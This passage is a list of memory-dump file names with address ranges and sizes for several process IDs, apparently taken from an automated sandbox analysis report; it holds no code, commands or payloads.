                                                      • memory/2724-24-0x00000000064B0000-0x00000000064E2000-memory.dmp

                                                        Filesize

                                                        200KB

                                                      • memory/2724-23-0x0000000005F10000-0x0000000005F5C000-memory.dmp

                                                        Filesize

                                                        304KB

                                                      • memory/2724-22-0x0000000005ED0000-0x0000000005EEE000-memory.dmp

                                                        Filesize

                                                        120KB

                                                      • memory/2724-5-0x0000000004970000-0x00000000049A6000-memory.dmp

                                                        Filesize

                                                        216KB

                                                      • memory/2724-10-0x0000000005800000-0x0000000005866000-memory.dmp

                                                        Filesize

                                                        408KB

                                                      • memory/2724-8-0x0000000005160000-0x0000000005788000-memory.dmp

                                                        Filesize

                                                        6.2MB

                                                      • memory/2724-11-0x0000000005870000-0x00000000058D6000-memory.dmp

                                                        Filesize

                                                        408KB

                                                      • memory/2724-9-0x0000000004F20000-0x0000000004F42000-memory.dmp

                                                        Filesize

                                                        136KB

                                                      • memory/3448-3-0x000000007FA70000-0x000000007FE41000-memory.dmp

                                                        Filesize

                                                        3.8MB

                                                      • memory/3448-2-0x0000000000400000-0x0000000000DF6000-memory.dmp

                                                        Filesize

                                                        10.0MB

                                                      • memory/3448-0-0x0000000000400000-0x0000000000DF6000-memory.dmp

                                                        Filesize

                                                        10.0MB

                                                      • memory/3448-1-0x000000007FA70000-0x000000007FE41000-memory.dmp

                                                        Filesize

                                                        3.8MB

                                                      • memory/4232-120-0x00000293D6AA0000-0x00000293D6AC2000-memory.dmp

                                                        Filesize

                                                        136KB

                                                      • memory/4768-296-0x0000000000400000-0x0000000000DB1000-memory.dmp

                                                        Filesize

                                                        9.7MB

                                                      • memory/4768-375-0x0000000000400000-0x0000000000DB1000-memory.dmp

                                                        Filesize

                                                        9.7MB

                                                      • memory/4768-322-0x0000000000400000-0x0000000000DB1000-memory.dmp

                                                        Filesize

                                                        9.7MB

                                                      • memory/4768-408-0x0000000000400000-0x0000000000DB1000-memory.dmp

                                                        Filesize

                                                        9.7MB

                                                      • memory/4768-349-0x0000000000400000-0x0000000000DB1000-memory.dmp

                                                        Filesize

                                                        9.7MB

                                                      • memory/4768-350-0x0000000000400000-0x0000000000DB1000-memory.dmp

                                                        Filesize

                                                        9.7MB

                                                      • memory/4768-406-0x0000000000400000-0x0000000000DB1000-memory.dmp

                                                        Filesize

                                                        9.7MB

                                                      • memory/4768-404-0x0000000000400000-0x0000000000DB1000-memory.dmp

                                                        Filesize

                                                        9.7MB

                                                      • memory/4768-361-0x0000000000400000-0x0000000000DB1000-memory.dmp

                                                        Filesize

                                                        9.7MB

                                                      • memory/4768-393-0x0000000000400000-0x0000000000DB1000-memory.dmp

                                                        Filesize

                                                        9.7MB

                                                      • memory/4768-363-0x0000000000400000-0x0000000000DB1000-memory.dmp

                                                        Filesize

                                                        9.7MB

                                                      • memory/4768-391-0x0000000000400000-0x0000000000DB1000-memory.dmp

                                                        Filesize

                                                        9.7MB

                                                      • memory/4944-360-0x0000000000400000-0x0000000000DB1000-memory.dmp

                                                        Filesize

                                                        9.7MB

                                                      • memory/4944-192-0x0000000000400000-0x0000000000DB1000-memory.dmp

                                                        Filesize

                                                        9.7MB

                                                      • memory/4944-86-0x0000000000400000-0x0000000000DB1000-memory.dmp

                                                        Filesize

                                                        9.7MB

                                                      • memory/4944-390-0x0000000000400000-0x0000000000DB1000-memory.dmp

                                                        Filesize

                                                        9.7MB

                                                      • memory/4944-267-0x0000000000400000-0x0000000000DB1000-memory.dmp

                                                        Filesize

                                                        9.7MB

                                                      • memory/4944-392-0x0000000000400000-0x0000000000DB1000-memory.dmp

                                                        Filesize

                                                        9.7MB

                                                      • memory/4944-362-0x0000000000400000-0x0000000000DB1000-memory.dmp

                                                        Filesize

                                                        9.7MB

                                                      • memory/4944-374-0x0000000000400000-0x0000000000DB1000-memory.dmp

                                                        Filesize

                                                        9.7MB

                                                      • memory/4944-403-0x0000000000400000-0x0000000000DB1000-memory.dmp

                                                        Filesize

                                                        9.7MB

                                                      • memory/4944-321-0x0000000000400000-0x0000000000DB1000-memory.dmp

                                                        Filesize

                                                        9.7MB

                                                      • memory/4944-297-0x0000000000400000-0x0000000000DB1000-memory.dmp

                                                        Filesize

                                                        9.7MB

                                                      • memory/4944-405-0x0000000000400000-0x0000000000DB1000-memory.dmp

                                                        Filesize

                                                        9.7MB

                                                      • memory/4944-407-0x0000000000400000-0x0000000000DB1000-memory.dmp

                                                        Filesize

                                                        9.7MB

                                                      • memory/4944-348-0x0000000000400000-0x0000000000DB1000-memory.dmp

                                                        Filesize

                                                        9.7MB